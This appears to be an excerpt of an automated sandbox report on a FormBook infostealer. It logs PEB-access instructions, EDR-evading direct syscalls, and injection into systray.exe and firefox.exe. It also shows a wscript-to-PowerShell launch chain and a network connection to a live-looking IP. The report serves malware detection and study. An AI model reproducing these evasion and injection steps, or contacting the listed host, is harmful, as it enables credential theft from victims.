              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FF5B0 mov eax, dword ptr fs:[00000030h]5_2_013FF5B0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FF5B0 mov eax, dword ptr fs:[00000030h]5_2_013FF5B0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FF5B0 mov eax, dword ptr fs:[00000030h]5_2_013FF5B0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FF5B0 mov eax, dword ptr fs:[00000030h]5_2_013FF5B0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FF5B0 mov eax, dword ptr fs:[00000030h]5_2_013FF5B0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FF5B0 mov eax, dword ptr fs:[00000030h]5_2_013FF5B0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0140A5D0 mov eax, dword ptr fs:[00000030h]5_2_0140A5D0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0140A5D0 mov eax, dword ptr fs:[00000030h]5_2_0140A5D0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0144D5D0 mov eax, dword ptr fs:[00000030h]5_2_0144D5D0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0144D5D0 mov ecx, dword ptr fs:[00000030h]5_2_0144D5D0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F15A9 mov eax, dword ptr fs:[00000030h]5_2_013F15A9
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F15A9 mov eax, dword ptr fs:[00000030h]5_2_013F15A9
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F15A9 mov eax, dword ptr fs:[00000030h]5_2_013F15A9
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F15A9 mov eax, dword ptr fs:[00000030h]5_2_013F15A9
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F15A9 mov eax, dword ptr fs:[00000030h]5_2_013F15A9
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014A35D7 mov eax, dword ptr fs:[00000030h]5_2_014A35D7
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014A35D7 mov eax, dword ptr fs:[00000030h]5_2_014A35D7
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014A35D7 mov eax, dword ptr fs:[00000030h]5_2_014A35D7
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0140C5ED mov eax, dword ptr fs:[00000030h]5_2_0140C5ED
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0140C5ED mov eax, dword ptr fs:[00000030h]5_2_0140C5ED
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013C758F mov eax, dword ptr fs:[00000030h]5_2_013C758F
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013C758F mov eax, dword ptr fs:[00000030h]5_2_013C758F
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013C758F mov eax, dword ptr fs:[00000030h]5_2_013C758F
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D2582 mov eax, dword ptr fs:[00000030h]5_2_013D2582
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D2582 mov ecx, dword ptr fs:[00000030h]5_2_013D2582
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01404588 mov eax, dword ptr fs:[00000030h]5_2_01404588
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F15F4 mov eax, dword ptr fs:[00000030h]5_2_013F15F4
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F15F4 mov eax, dword ptr fs:[00000030h]5_2_013F15F4
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F15F4 mov eax, dword ptr fs:[00000030h]5_2_013F15F4
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F15F4 mov eax, dword ptr fs:[00000030h]5_2_013F15F4
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F15F4 mov eax, dword ptr fs:[00000030h]5_2_013F15F4
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F15F4 mov eax, dword ptr fs:[00000030h]5_2_013F15F4
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0145B594 mov eax, dword ptr fs:[00000030h]5_2_0145B594
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0145B594 mov eax, dword ptr fs:[00000030h]5_2_0145B594
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FE5E7 mov eax, dword ptr fs:[00000030h]5_2_013FE5E7
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FE5E7 mov eax, dword ptr fs:[00000030h]5_2_013FE5E7
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FE5E7 mov eax, dword ptr fs:[00000030h]5_2_013FE5E7
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FE5E7 mov eax, dword ptr fs:[00000030h]5_2_013FE5E7
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FE5E7 mov eax, dword ptr fs:[00000030h]5_2_013FE5E7
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FE5E7 mov eax, dword ptr fs:[00000030h]5_2_013FE5E7
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FE5E7 mov eax, dword ptr fs:[00000030h]5_2_013FE5E7
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FE5E7 mov eax, dword ptr fs:[00000030h]5_2_013FE5E7
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0140E59C mov eax, dword ptr fs:[00000030h]5_2_0140E59C
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D25E0 mov eax, dword ptr fs:[00000030h]5_2_013D25E0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014505A7 mov eax, dword ptr fs:[00000030h]5_2_014505A7
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014505A7 mov eax, dword ptr fs:[00000030h]5_2_014505A7
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014505A7 mov eax, dword ptr fs:[00000030h]5_2_014505A7
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F95DA mov eax, dword ptr fs:[00000030h]5_2_013F95DA
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D65D0 mov eax, dword ptr fs:[00000030h]5_2_013D65D0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0148F5BE mov eax, dword ptr fs:[00000030h]5_2_0148F5BE
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014635BA mov eax, dword ptr fs:[00000030h]5_2_014635BA
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014635BA mov eax, dword ptr fs:[00000030h]5_2_014635BA
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014635BA mov eax, dword ptr fs:[00000030h]5_2_014635BA
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014635BA mov eax, dword ptr fs:[00000030h]5_2_014635BA
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0140E443 mov eax, dword ptr fs:[00000030h]5_2_0140E443
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0140E443 mov eax, dword ptr fs:[00000030h]5_2_0140E443
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0140E443 mov eax, dword ptr fs:[00000030h]5_2_0140E443
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0140E443 mov eax, dword ptr fs:[00000030h]5_2_0140E443
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0140E443 mov eax, dword ptr fs:[00000030h]5_2_0140E443
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0140E443 mov eax, dword ptr fs:[00000030h]5_2_0140E443
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0140E443 mov eax, dword ptr fs:[00000030h]5_2_0140E443
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0140E443 mov eax, dword ptr fs:[00000030h]5_2_0140E443
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0148F453 mov eax, dword ptr fs:[00000030h]5_2_0148F453
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CC427 mov eax, dword ptr fs:[00000030h]5_2_013CC427
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CE420 mov eax, dword ptr fs:[00000030h]5_2_013CE420
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CE420 mov eax, dword ptr fs:[00000030h]5_2_013CE420
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CE420 mov eax, dword ptr fs:[00000030h]5_2_013CE420
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0145C460 mov ecx, dword ptr fs:[00000030h]5_2_0145C460
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F340D mov eax, dword ptr fs:[00000030h]5_2_013F340D
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014A547F mov eax, dword ptr fs:[00000030h]5_2_014A547F
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01408402 mov eax, dword ptr fs:[00000030h]5_2_01408402
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01408402 mov eax, dword ptr fs:[00000030h]5_2_01408402
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01408402 mov eax, dword ptr fs:[00000030h]5_2_01408402
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FA470 mov eax, dword ptr fs:[00000030h]5_2_013FA470
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FA470 mov eax, dword ptr fs:[00000030h]5_2_013FA470
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FA470 mov eax, dword ptr fs:[00000030h]5_2_013FA470
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01457410 mov eax, dword ptr fs:[00000030h]5_2_01457410
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D1460 mov eax, dword ptr fs:[00000030h]5_2_013D1460
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D1460 mov eax, dword ptr fs:[00000030h]5_2_013D1460
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D1460 mov eax, dword ptr fs:[00000030h]5_2_013D1460
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D1460 mov eax, dword ptr fs:[00000030h]5_2_013D1460
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D1460 mov eax, dword ptr fs:[00000030h]5_2_013D1460
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013EF460 mov eax, dword ptr fs:[00000030h]5_2_013EF460
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013EF460 mov eax, dword ptr fs:[00000030h]5_2_013EF460
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013EF460 mov eax, dword ptr fs:[00000030h]5_2_013EF460
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013EF460 mov eax, dword ptr fs:[00000030h]5_2_013EF460
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013EF460 mov eax, dword ptr fs:[00000030h]5_2_013EF460
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013EF460 mov eax, dword ptr fs:[00000030h]5_2_013EF460
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013C645D mov eax, dword ptr fs:[00000030h]5_2_013C645D
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F245A mov eax, dword ptr fs:[00000030h]5_2_013F245A
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01456420 mov eax, dword ptr fs:[00000030h]5_2_01456420
              Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\System32\wscript.exeNetwork Connect: 87.120.120.56 80Jump to behavior
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeNtClose: Direct from: 0x76EF2B6C
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
              Maps a DLL or memory area into another process
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeSection loaded: NULL target: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\RegAAsm.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeSection loaded: NULL target: C:\Windows\SysWOW64\systray.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: NULL target: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: NULL target: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
              Modifies the context of a thread in another process (thread injection)
              Source: C:\Windows\SysWOW64\systray.exeThread register set: target process: 7120Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\JSDSDGSD.ps1"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\Temp\RegAAsm.exe "C:\Users\user\AppData\Local\Temp\RegAAsm.exe" Jump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeProcess created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: HDIZeRcLxXsNvd.exe, 00000008.00000000.2595880112.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, HDIZeRcLxXsNvd.exe, 00000008.00000002.3363377023.0000000001A51000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
              Source: HDIZeRcLxXsNvd.exe, 00000008.00000000.2595880112.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, HDIZeRcLxXsNvd.exe, 00000008.00000002.3363377023.0000000001A51000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: HDIZeRcLxXsNvd.exe, 00000008.00000000.2595880112.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, HDIZeRcLxXsNvd.exe, 00000008.00000002.3363377023.0000000001A51000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: HDIZeRcLxXsNvd.exe, 00000008.00000000.2595880112.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, HDIZeRcLxXsNvd.exe, 00000008.00000002.3363377023.0000000001A51000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 5.2.RegAAsm.exe.7d0000.0.unpack, type: UNPACKEDPE
